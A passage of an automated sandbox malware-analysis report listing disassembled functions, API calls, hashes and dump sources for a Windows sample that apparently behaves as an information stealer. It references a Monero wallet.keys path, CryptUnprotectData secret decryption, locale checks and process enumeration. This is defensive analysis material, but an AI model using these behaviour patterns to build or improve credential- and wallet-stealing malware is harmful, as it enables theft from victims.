                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .v>~$0r/$4'Gk$CF{$C\`$Qd$YQ<$a&n$q#zB
                          • API String ID: 0-3321932839
                          • Opcode ID: 7dbbe45b65a982a2dc1055af29a1a86fc881a20b4be650756c30c91d43360494
                          • Instruction ID: 4d90128637c36b9c962f9b707912ee112e280b47cdcc22ebe14bff668f08c976
                          • Opcode Fuzzy Hash: 7dbbe45b65a982a2dc1055af29a1a86fc881a20b4be650756c30c91d43360494
                          • Instruction Fuzzy Hash: 87B20AF360C2049FE3046E2DEC85A7AB7D9EFD4720F1A853DEAC4C7744E93598058696
                          Function 007D49D5 Relevance: 11.6, Strings: 8, Instructions: 1616COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >{}$/G5$CA[e$O<ww$PA7$vL/{$x#td${=s
                          • API String ID: 0-3150352856
                          • Opcode ID: 47c6e93481a51081abff104e8fbb60d24178ae6cc5659198aa22b93001d09270
                          • Instruction ID: 32dfd952fe471e7d546efa0cfc136643145d96fa83b204e6424388b826c3b112
                          • Opcode Fuzzy Hash: 47c6e93481a51081abff104e8fbb60d24178ae6cc5659198aa22b93001d09270
                          • Instruction Fuzzy Hash: CFB2E7F3A0C614AFE304AE2DDC8577AB7E9EF94320F16453DEAC4C7744EA3598018696
                          Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                          • LocalFree.KERNEL32(00000000), ref: 00417D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                          • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                          • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                          • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                          Function 0040E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                          • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                          • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                          • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                          • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                          • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                          Function 007CC1ED Relevance: 9.1, Strings: 6, Instructions: 1620COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *o$Z6]$jG_$m.>=$sg?_$]X
                          • API String ID: 0-3931413294
                          • Opcode ID: 8bbb84bb6aaf109e494c0f5fefb271528db971104d2b73c5b11516cedf809f00
                          • Instruction ID: 6c8a1aad88b9cc77a1a45e4a294c16866969c45720f22bc4be6f59a9e2aac67e
                          • Opcode Fuzzy Hash: 8bbb84bb6aaf109e494c0f5fefb271528db971104d2b73c5b11516cedf809f00
                          • Instruction Fuzzy Hash: 2AB2F7F350C2049FE304AE29EC8567ABBE9EFD4720F1A893DEAC487744E63558058697
                          Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                          • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID: N@
                          • API String ID: 4291131564-4229412743
                          • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                          • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                          • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                          • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                          Function 007D7E76 Relevance: 7.9, Strings: 5, Instructions: 1629COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'B#$`(ck$(W^$]SZ$yo
                          • API String ID: 0-3128703432
                          • Opcode ID: 35c74f234dbade45420e1dcbbad3033f90fbd2316ae1de452c65449dcb404173
                          • Instruction ID: 85d02d3626706ca22bcd0319d2293e2f104787a68d8be060f9650a37006f9a2d
                          • Opcode Fuzzy Hash: 35c74f234dbade45420e1dcbbad3033f90fbd2316ae1de452c65449dcb404173
                          • Instruction Fuzzy Hash: EDB2E5F360C200AFE704AE2DEC8567ABBE9EF98760F16453DE6C4C3744E63598058697
                          Function 0040C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0040C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                          • lstrcat.KERNEL32(?,00420B46), ref: 0040C943
                          • lstrcat.KERNEL32(?,00420B47), ref: 0040C957
                          • lstrcat.KERNEL32(?,00420B4E), ref: 0040C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 0e27517af7786fde1072e19809729dc6fc504a642fc4fdd406e8db63305c5b31
                          • Instruction ID: 8fce10467124e2efb13c7dc6e204b966083c6881a17acb566ee419f20f6b0b4d
                          • Opcode Fuzzy Hash: 0e27517af7786fde1072e19809729dc6fc504a642fc4fdd406e8db63305c5b31
                          • Instruction Fuzzy Hash: AD41A0B9D4421AEFDB10DFE0DD89BEEB7B8BB44304F1042A9E509A62C0D7745A84CF95
                          Function 00416920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0041696C
                          • sscanf.NTDLL ref: 00416999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004169B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004169C0
                          • ExitProcess.KERNEL32 ref: 004169DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                          • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                          • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                          • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                          Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00407254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004072A4
                          • LocalFree.KERNEL32(?), ref: 004072AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                          • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                          • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                          • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                          Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                          • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                          • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                          • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                          • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                          • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                          • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                          Function 007DB399 Relevance: 6.6, Strings: 4, Instructions: 1627COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
